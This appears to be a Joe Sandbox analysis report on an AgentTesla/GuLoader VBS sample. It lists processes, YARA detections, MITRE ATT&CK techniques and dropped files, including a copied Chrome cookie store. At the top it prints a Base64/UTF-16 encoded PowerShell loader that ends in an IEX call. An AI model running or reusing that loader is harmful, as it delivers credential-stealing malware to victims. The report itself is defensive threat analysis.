MAUwBrACAASgBlAGUASwBpAHgAQwB5AHQATwBtAGUAUgB1AHIAawBvAG4ASgBkACAAUwBlAEkATABhAG4AVAB5AHQASABpAFAAUwBwAHQARwByAHIAVABoACAAUwBsAFYAUwBrAGkAQgBhAHQATABuAHIAcwBtAHUAQQB3AHMAQQByAGEAUgBlADMASABlADIATgBuACgAUgB1AHUAUABpAGkARQB4AG4AUwB2AHQATABlACAAbABpAHUAVABpAHYAUgBlAG8ATgBlAHIASQBuADUAUwB1ACwASgBhAGkAUwB0AG4ARgBpAHQAUwBpACAAUwBrAHUAQgBlAHYAQQBmAG8ASABhAHIARwBsADYAVABvACkAUwBhADsACgBDAGkAWwBEAGEARABVAHAAbABQAG8AbABVAG4ASQBLAHIAbQBHAHIAcABoAG8AbwBTAHkAcgBJAG4AdABTAGUAKABTAG8AIgBOAHMAawBkAGUAZQBTAHMAcgBSAGkAbgBDAG8AZQBQAHIAbABDAHIAMwB1AGwAMgBFAHgAIgBUAHIAKQBTAGsAXQBuAGUAcABCAGUAdQBQAGUAYgBJAG0AbABOAGkAaQBSAGkAYwBDAGEAIABCAHUAcwBSAGUAdABOAGUAYQBJAG4AdABGAG8AaQBJAG4AYwBjAG8AIABMAG8AZQBIAGkAeABJAGQAdABGAGkAZQBVAG4AcgBCAGUAbgBTAGsAIABTAG8AaQBUAGEAbgBTAGEAdABJAG4AIABQAHIAUwBUAGEAZQBUAG8AdABQAHIAVABEAGEAaABTAHkAcgBEAHYAZQBVAGgAYQBjAG8AZABCAHIAQwBEAGkAbwBQAG8AbgBBAGYAdABOAGUAZQBEAGUAeABBAGwAdABSAGUAKABIAG8AaQBSAGEAbgBPAHIAdABGAHUAIABwAGUATgBEAGEAZQBTAHQAZABTAHUAZgBUAHIAbwBGAG8AdABTAHQALABQAHIAaQBLAHUAbgBVAG4AdABUAGUAIABXAGEATgBTAGsAbwBTAHYAbgBVAGQAZwBGAHIAKQBKAGUAOwAKAEcAdQBbAEIAZQBEAEYAeQBsAFAAbwBsAHMAZQBJAFAAcgBtAFMAaABwAEIAcgBvAEMAcgByAEMAbwB0AEIAdQAoAEMAbwAiAFAAZQBrAEgAaQBlAE0AZQByAEcAdQBuAEYAYQBlAEEAdQBsAEIAYQAzAFMAaAAyAFQAYQAiAEYAbAAsAEIAcgAgAE0AeQBFAEsAaQBuAFMAcAB0AEcAeQByAFIAZQB5AE8AZABQAFAAcgBvAEUAbgBpAEUAZgBuAEwAYQB0AFUAawA9AFIAZQAiAFMAeQAkAFAAZQB1AEEAbAB2AEMAaABvAFUAZAByAHMAawA5AEQAbwAiAEMAbwApAFMAZQBdAFQAYQBwAE0AYQB1AEMAbwBiAEMAaABsAE8AdgBpAEYAeQBjAE0AYQAgAGkAbgBzAE0AZQB0AFMAaQBhAFIAZQB0AEQAZQBpAG0AZQBjAEcAcgAgAGQAeQBlAFUAbgB4AEwAdQB0AG8AdQBlAFMAcQByAEsAYQBuAEUAcwAgAE4AYQBpAEYAbABuAEEAbgB0AFQAaQAgAE8AdQBUAFAAYQBFAFAAZQBMAE0AbwBPAFQAaQAoAFMAYwBpAEsAawBuAEkAbgB0AE8AcAAgAFQAYQBDAFUAZABsAFUAdgBhAEYAbwBkAFMAdgBvAEIAZQBnAFIAYQBlAFMAaQBuAEMAbwBlAEcAZQB0AEgAYQA2AHMAcgAsAEYAaQAgAE8AcABpAFcAYQBuAFYAYQB0AEUAeAAgAE0AYQBEAFAAcgB5AEIAZQBuAEQAZQBlAEIAbwAsAFMAbwBpAEkAbgBuAEYAbAB0AFoAeQAgAFQAZQB1AEQAYQB2AFMAYQBvAEEAcgByAHMAawAsAEsAbAAgAFIAZQBpAEQAcgBuAFQAcgB0AEYAZQAgAEYAbgBDAE4AbwBsAEIAZQBhAFIAZQBkAEIAYQBvAEcAbwBnAFMAdQBlAEYAbwBuAFMAdABlAFIAZQB0AEkAbgApAFMAYQA7AAoATABpAH0ACgBEAG8AIgBMAHIAQAAKAEcAcgAkAEkAbgBDAEYAaQBsAE4AdQBhAEgAZQBkAEsAZQBvAEQAZQBnAEwAYQBlAEoAdQBuAE0AbwBlAFIAZQB0AEIAbwAzAGQAbwA9AFIAbwBbAFMAdABDAHMAYQBsAEwAZQBhAFMAdABkAEIAZQBvAFYAZQBnAFIAYQBlAFkAbwBuAFMAbwBlAEIAcgB0AFUAZAAxAEoAYQBdAFkAbwA6AEYAbAA6AFIAaABUAEEAbABFAEYAbwBMAEYAbwBPAEcAcgAoAEwAaQAwAE0AYQAsAFMAZQAxAFAAZQAwAE0AYQA0AFMAdQA4AFQAcgA1AFMAbwA3AE0AbwA2AEEAZQAsAFQAdQAxAFMAcAAyAFIAdQAyAEEAYwA4AEkAbgA4AEUAcAAsAEcAdQA2AEgAYQA0AEwAbwApAAoAaQBuACQAUwBrAEsAUwBrAHYAUwB0AGEAUwBlAHIARQBkAHQASwBvAGEAUwBhAGwARABvAHMARgBvAHYARgBvAD0AVABhACgASwBsAEcAUABhAGUAQgByAHQAQQBtAC0ATQBhAEkARQBuAHQARgBsAGUATABkAG0AVABhAFAARgBvAHIAcABlAG8AQgBsAHAARABvAGUAVQBuAHIARABhAHQASgB1AHkARABpACAAUgBvAC0AUwB5AFAAVABpAGEAUwB1AHQATgByAGgAVQBkACAAVgBhACIAQQByAEgAVgBhAEsASABqAEMAUABvAFUAQwBhADoAQQBmAFwASwByAFMAVABlAG8ASQBuAGYARgBvAHQARgB1AHcARQBsAGEAVgBpAHIASABvAGUAUwBsAFwAVwBvAGQATgBvAHIAYwBhAG0ARgBsAG0ATwB2AGUASwB2AHIAUwBoACIAUABlACkARAB1AC4AVABlAHMASQBtAGsAQgBhAG8AVQB1AGwAVAByAGUACgBGAG8AJABVAGQASQBPAG4AbgBHAHUAdABUAG8AZQBFAHgAcgBDAGEAcABDAGUAbABUAGEAIABEAHIAPQBTAHkAIABDAG8AWwB1AG4AUwBFAHYAeQBSAGUAcwBTAHQAdABTAGwAZQBCAHIAbQBTAGEALgBVAGQAQgBEAHUAeQBDAGUAdABCAHUAZQBzAGsAWwBOAGUAXQBPAG0AXQBDAG8AOgBPAHYAOgBGAHkAQwBSAGUAcgBSAGUAZQBNAG8AYQBOAGEAdABTAGsAZQBUAGUASQBTAHAAbgBLAGEAcwBTAHkAdABCAGoAYQBQAHIAbgBEAGUAYwBUAHIAZQBlAHUAKABFAHgAWwBPAHAAUwBGAG8AeQBBAGMAcwBBAGYAdABCAGkAZQBrAG8AbQBQAGEALgBOAGUAQgBBAGMAeQBhAGwAdABUAHIAZQBTAGkAXQBCAGwALABTAHAAJABGAGUASwBTAGwAdgBOAGEAYQBXAGEAcgBQAGEAdABDAG8AYQBSAGUAbABSAGUAcwBGAG8AdgBiAGkALgBIAHkATABTAGUAZQBPAHYAbgBSAGUAZwBGAG8AdABCAG8AaABNAGkAIABTAHQALwBSAGUAIABTAG0AMgBSAGEAKQAKAEMAaQBGAFMAagBvAE8AdQByAEUAcAAoAEYAbwAkAEEAZwBpAEUAcwA9AEkAbgAwAGYAcgA7AEIAZQAgAHQAZQAkAFMAZQBpAFMAaQAgAFUAcgAtAEwAYQBsAFQAbwB0AFMAYQAgAEMAbwAkAFMAYQBLAEEAbgB2AE4AeQBhAFAAcgByAEkAcwB0AEYAcgBhAEIAcgBsAFYAYQBzAEgAdQB2AEgAZQAuAE8AbABMAFUAbgBlAEMAbABuAEYAZQBnAEMAbwB0AFAAYQBoAFQAYQA7AFMAbwAgAEUAbgAkAE0AYQBpAEEAdQArAEsAdQA9AEkAbgAyAEQAZQApAAoAUwBuAHsACgBPAHYACQBVAGQAJABMAGUASQBOAG8AbgBTAGwAdABIAGkAZQBTAGEAcgBIAHkAcABUAHUAbABBAGwAWwBBAG4AJABxAHUAaQBLAHYALwBuAHUAMgBGAGkAXQBBAHIAIABWAG8APQBGAG8AIABGAGkAWwBDAGUAYwBJAG4AbwBFAG0AbgBiAGEAdgBWAGEAZQBTAHQAcgBTAHIAdABPAGwAXQBLAG4AOgBPAHAAOgBTAGkAVABGAGkAbwBEAGUAQgBSAGEAeQBLAG8AdABUAHYAZQBZAGEAKABsAGEAJABNAGEASwBWAG8AdgBNAGEAYQBMAGEAcgBVAG4AdABEAGUAYQBNAGUAbABCAGEAcwBSAGUAdgBEAHIALgBHAGEAUwBWAGEAdQBEAGkAYgBNAGUAcwBXAGUAdABVAHAAcgBEAGkAaQBIAHMAbgBTAHQAZwBUAGUAKABEAHkAJABNAGEAaQBFAHMALABSAGUAIABBAHIAMgBJAG4AKQBzAHQALABCAGUAIABJAG4AMQBQAGkANgBTAGEAKQAKAEYAbwB9AAoAQQB1AGYATwB2AG8ATAB1AHIASgBlACgAVAB5ACQAUwB2AFMAUgBoAHYAawBvAGUAVgByAGoATgB5AHMAYwBoAGUARwBvAG0ASwByAGUATwBwAD0AZABhADAARgBpADsATABpACAAVABhACQAUgBlAFMAQgBsAHYAUgB1AGUAVQBkAGoAVQBkAHMASQBuAGUATgBhAG0AQQBjAGUATQBhACAASwBvAC0AQQBzAGwAUwBhAHQAcwB1ACAASAB5ACQAdQBuAEkAVQBuAG4ASABrAHQAcwBlAGUARgBvAHIARwBhAHAAVQBuAGwARgBpAC4AQQB1AGMASAB5AG8AUwBhAHUAUAByAG4ARgByAHQAUwBtACAAVABqADsAUgBlACAASwByACQASwBsAFMATwBsAHYAWgBpAGUAUwBrAGoAUgB1AHMAVgBlAGUATgB5AG0ATABpAGUASwBhACsARABpACsAUwBuACkACgBTAGUAewAKAEIAaQAJAEgAZQBbAFQAaQBDAFcAaABsAFMAZQBhAFMAdABkAEMAaABvAFMAawBnAEwAaQBlAGYAbwBuAEEAcgBlAEMAbwB0AEEAYgAxAEIAbABdAEUAZgA6AFQAcgA6AFAAaQBSAFQAagB0AHAAaABsAFUAbABNAEQAYQBvAE8AdQB2AEQAeQBlAFUAbgBNAEUAbgBlAEEAZABtAEQAaQBvAEwAbwByAFUAbgB5AGcAaQAoAFcAYQAkAFMAdQBDAEYAZQBsAEwAbwBhAEEAZABkAEgAeQBvAE8AdQBnAEcAcgBlAFAAbABuAEMAaABlAFUAbgB0AEEAcgAzAFIAZQArAFMAYwAkAFUAbgBTAFkAdQB2AFUAbgBlAE4AaQBqAEMAbwBzAGEAcgBlAEgAcgBtAHMAbwBlAE0AZQAsAGYAcgBbAEkAZAByAFUAbgBlAEQAdQBmAFAAbABdAEMAbAAkAEQAZQBJAFMAeQBuAEcAcgB0AEQAZQBlAGIAZQByAFUAbgBwAEkAbQBsAHYAaQBbAEcAZQAkAFQAZQBTAEYAaQB2AEQAaQBlAEIAYQBqAE0AbwBzAFIAZQBlAEwAaQBtAE8AdQBlAFAAdQBdAFUAbgAsAFQAdgAxAFMAdQApAAoATwBtAH0ACgBMAGkAWwBQAGUAQwBLAGEAbABTAGwAYQBiAG8AZABVAG4AbwBGAGEAZwBFAGwAZQBhAGcAbgBDAGEAZQBXAGkAdABNAHUAMQB0AHUAXQBCAG8AOgBNAG8AOgBLAHIAVgBQAHIAaQBQAHIAdABIAGUAcgBPAHIAdQBSAGEAcwBVAG4AYQBTAHQAMwBTAGEAMgBOAGUAKABUAHIAJABUAGkAQwBWAGkAbABwAGEAYQBJAG4AZABDAHkAbwBTAGwAZwBJAG0AZQBOAG8AbgBTAGEAZQBHAGwAdABTAHQAMwBEAGkALABBAGEAIABWAGkAMABGAG8AKQBMAG8AIwAKACcAQAANAAoADQAKAA0ACgANAAoADQAKAEYAbwByACgAJABpAD0AMgA7ACAAJABpACAALQBsAHQAIAAkAE0AaQBsAGoAdgByAG4AZQB0AGwALgBMAGUAbgBnAHQAaAAtADEAOwAgACQAaQArAD0AKAAyACsAMQApACkADQAKAHsADQAKAAkADQAKAAkAJAB1AHYAbwByACAAPQAgACQAdQB2AG8AcgAgACsAIAAkAE0AaQBsAGoAdgByAG4AZQB0AGwALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAaQAsACAAMQApAA0ACgAJAA0ACgAJAGkAZgAgACgAJABNAGkAbABqAHYAcgBuAGUAdABsAC4AUwB1AGIAcwB0AHIAaQBuAGcAKAAkAGkAKwAxACwAIAAxACkAIAAtAGUAcQAgACIAYABuACIAKQAgAHsADQAKAAkACQAkAHUAdgBvAHIAIAA9ACAAJAB1AHYAbwByACAAKwAgACIAYABuACIADQAKAAkACQAkAGkAIAA9ACAAJABpACAAKwAgADEADQAKAAkAfQAgAAkADQAKAAkACQANAAoACQANAAoAfQANAAoADQAKAA0ACgBJAEUAWAAgACQAdQB2AG8AcgANAAoA
Imagebase:	0x630000
File size:	433152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: SUSP_PS1_JAB_Pattern_Jun22_1, Description: Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, Source: 00000014.00000002.2220743788.0000000009E20000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000014.00000002.2220743788.0000000009E20000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: SUSP_PS1_JAB_Pattern_Jun22_1, Description: Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, Source: 00000014.00000002.2103587544.0000000004C30000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth Rule: SUSP_PS1_JAB_Pattern_Jun22_1, Description: Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, Source: 00000014.00000002.2099293106.0000000003010000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth Rule: SUSP_PS1_JAB_Pattern_Jun22_1, Description: Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, Source: 00000014.00000002.2096104717.0000000002EDA000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth Rule: SUSP_PS1_JAB_Pattern_Jun22_1, Description: Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, Source: 00000014.00000003.1512001892.0000000002F62000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth Rule: SUSP_PS1_JAB_Pattern_Jun22_1, Description: Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, Source: 00000014.00000003.1609777781.00000000086AD000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth Rule: SUSP_PS1_JAB_Pattern_Jun22_1, Description: Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, Source: 00000014.00000002.2094575687.0000000002E90000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth Rule: SUSP_PS1_JAB_Pattern_Jun22_1, Description: Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, Source: 00000014.00000002.2098442263.0000000002F6B000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth Rule: SUSP_PS1_JAB_Pattern_Jun22_1, Description: Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, Source: 00000014.00000002.2100345664.0000000003290000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth Rule: SUSP_PS1_JAB_Pattern_Jun22_1, Description: Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, Source: 00000014.00000003.1523532169.0000000002F6B000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth Rule: SUSP_PS1_JAB_Pattern_Jun22_1, Description: Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, Source: 00000014.00000002.2105674011.0000000005081000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
Reputation:	moderate

Analysis Process: conhost.exePID: 9100, Parent PID: 9092

General

Target ID:	21
Start time:	16:12:34
Start date:	03/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff670ca0000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: csc.exePID: 4664, Parent PID: 9092

General

Target ID:	23
Start time:	16:13:02
Start date:	03/10/2022
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sepi5xx1\sepi5xx1.cmdline
Imagebase:	0xa40000
File size:	2141552 bytes
MD5 hash:	EB80BB1CA9B9C7F516FF69AFCFD75B7D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	moderate

Analysis Process: cvtres.exePID: 6776, Parent PID: 4664

General

Target ID:	24
Start time:	16:13:02
Start date:	03/10/2022
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA2B2.tmp" "c:\Users\user\AppData\Local\Temp\sepi5xx1\CSC7F7A267C826A46D5AA3589EC91649B9.TMP"
Imagebase:	0xcd0000
File size:	46832 bytes
MD5 hash:	70D838A7DC5B359C3F938A71FAD77DB0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: CasPol.exePID: 6376, Parent PID: 9092

General

Target ID:	25
Start time:	16:13:20
Start date:	03/10/2022
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
Imagebase:	0xc0000
File size:	108664 bytes
MD5 hash:	914F728C04D3EDDD5FBA59420E74E56B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: CasPol.exePID: 6564, Parent PID: 9092

General

Target ID:	26
Start time:	16:13:20
Start date:	03/10/2022
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
Imagebase:	0xf70000
File size:	108664 bytes
MD5 hash:	914F728C04D3EDDD5FBA59420E74E56B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: SUSP_PS1_JAB_Pattern_Jun22_1, Description: Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, Source: 0000001A.00000000.1970106356.0000000001350000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000001A.00000000.1970106356.0000000001350000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001A.00000002.5758113775.000000001DB71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001A.00000002.5758113775.000000001DB71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security

Disassembly

⊘No disassembly

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	DLL monitoring, File monitoring, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report PUMP mt310143121.vbs

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Agenttesla

Yara Signatures

Memory Dumps

Sigma Signatures

Data Obfuscation

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Temp\RESA2B2.tmp

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fo0nlcmw.oxc.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mfxogem4.yt2.psm1

C:\Users\user\AppData\Local\Temp\sepi5xx1\CSC7F7A267C826A46D5AA3589EC91649B9.TMP

C:\Users\user\AppData\Local\Temp\sepi5xx1\sepi5xx1.0.cs

C:\Users\user\AppData\Local\Temp\sepi5xx1\sepi5xx1.cmdline

C:\Users\user\AppData\Local\Temp\sepi5xx1\sepi5xx1.dll

C:\Users\user\AppData\Local\Temp\sepi5xx1\sepi5xx1.out

C:\Users\user\AppData\Roaming\5drowjrx.mtw\Chrome\Default\Cookies

